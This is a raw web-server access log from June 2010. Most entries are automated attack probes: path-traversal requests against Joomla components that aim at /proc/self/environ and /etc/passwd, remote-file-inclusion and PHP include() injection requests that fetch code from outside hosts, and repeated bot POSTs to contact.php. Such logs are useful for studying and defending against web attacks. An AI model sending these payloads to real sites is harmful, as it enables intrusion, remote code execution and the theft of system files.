195.20.196.20 - - [30/Jun/2010:21:59:27 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [30/Jun/2010:21:59:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [30/Jun/2010:21:59:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [30/Jun/2010:21:59:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [30/Jun/2010:21:59:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [30/Jun/2010:21:59:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [30/Jun/2010:21:59:31 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [30/Jun/2010:21:59:31 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.71.16.18 - - [30/Jun/2010:22:01:07 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.820"
193.71.16.18 - - [30/Jun/2010:22:01:07 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
193.71.16.18 - - [30/Jun/2010:22:01:08 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
194.126.234.29 - - [30/Jun/2010:22:02:02 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
193.71.16.18 - - [30/Jun/2010:22:04:11 -0500] "GET /logs/access_log.1276646400/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.820"
194.126.234.29 - - [30/Jun/2010:22:05:54 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
194.126.234.29 - - [30/Jun/2010:22:05:54 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
194.126.234.29 - - [30/Jun/2010:22:05:55 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
194.126.234.29 - - [30/Jun/2010:22:05:59 -0500] "GET /logs/access_log.1276214400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
66.249.71.185 - - [30/Jun/2010:22:09:29 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.112.180 - - [30/Jun/2010:22:09:49 -0500] "GET /logs/access_log.1263427200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.242 - - [30/Jun/2010:22:10:15 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.186.192.124 - - [30/Jun/2010:22:22:38 -0500] "GET /logs/access_log.1274572800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.186.192.124 - - [30/Jun/2010:22:22:38 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.186.192.124 - - [30/Jun/2010:22:22:38 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:22:24:37 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.195.112.180 - - [30/Jun/2010:22:26:58 -0500] "GET /artwork/jewelrybox.htm HTTP/1.0" 200 827 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.126.234.29 - - [30/Jun/2010:22:27:03 -0500] "GET /logs/access_log.1277164800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
194.126.234.29 - - [30/Jun/2010:22:27:03 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
194.126.234.29 - - [30/Jun/2010:22:27:04 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:02 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [30/Jun/2010:22:32:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
65.55.51.112 - - [30/Jun/2010:22:35:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.112 - - [30/Jun/2010:22:36:41 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.185 - - [30/Jun/2010:22:40:56 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.118.96.160 - - [30/Jun/2010:22:48:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:22:48:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:22:48:50 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.250.255.243 - - [30/Jun/2010:22:50:40 -0500] "GET /logs/access_log.1225238400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
119.73.183.190 - - [30/Jun/2010:22:51:28 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:22:51:28 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:22:51:28 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:22:51:28 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:22:51:31 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
92.241.190.214 - - [30/Jun/2010:22:52:04 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
92.241.190.214 - - [30/Jun/2010:22:52:04 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.241.190.214 - - [30/Jun/2010:22:52:05 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.40.100.50 - - [30/Jun/2010:22:57:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [30/Jun/2010:22:57:56 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [30/Jun/2010:22:57:56 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
119.73.183.190 - - [30/Jun/2010:22:58:06 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:22:58:06 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
66.249.71.185 - - [30/Jun/2010:23:01:13 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.110.132.245 - - [30/Jun/2010:23:01:48 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
79.110.132.245 - - [30/Jun/2010:23:01:48 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
79.110.132.245 - - [30/Jun/2010:23:01:51 -0500] "GET /logs/access_log.1266710400%20%20//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
67.195.112.180 - - [30/Jun/2010:23:02:56 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 2651 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.124.120.73 - - [30/Jun/2010:23:09:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:13 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:14 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:14 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:17 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:17 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:09:17 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.23.215.207 - - [30/Jun/2010:23:13:32 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
72.30.142.216 - - [30/Jun/2010:23:13:50 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.215.207 - - [30/Jun/2010:23:14:17 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
89.212.6.4 - - [30/Jun/2010:23:14:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:29 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:29 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:31 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:31 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:31 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:31 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [30/Jun/2010:23:14:31 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
69.175.127.170 - - [30/Jun/2010:23:14:40 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.127.170 - - [30/Jun/2010:23:14:40 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.175.127.170 - - [30/Jun/2010:23:14:40 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.86.75.179 - - [30/Jun/2010:23:16:49 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:16:49 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:16:49 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:16:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.246.218.140 - - [30/Jun/2010:23:19:23 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:23:19:23 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:23:19:23 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:23:20:00 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:23:20:00 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:23:20:01 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
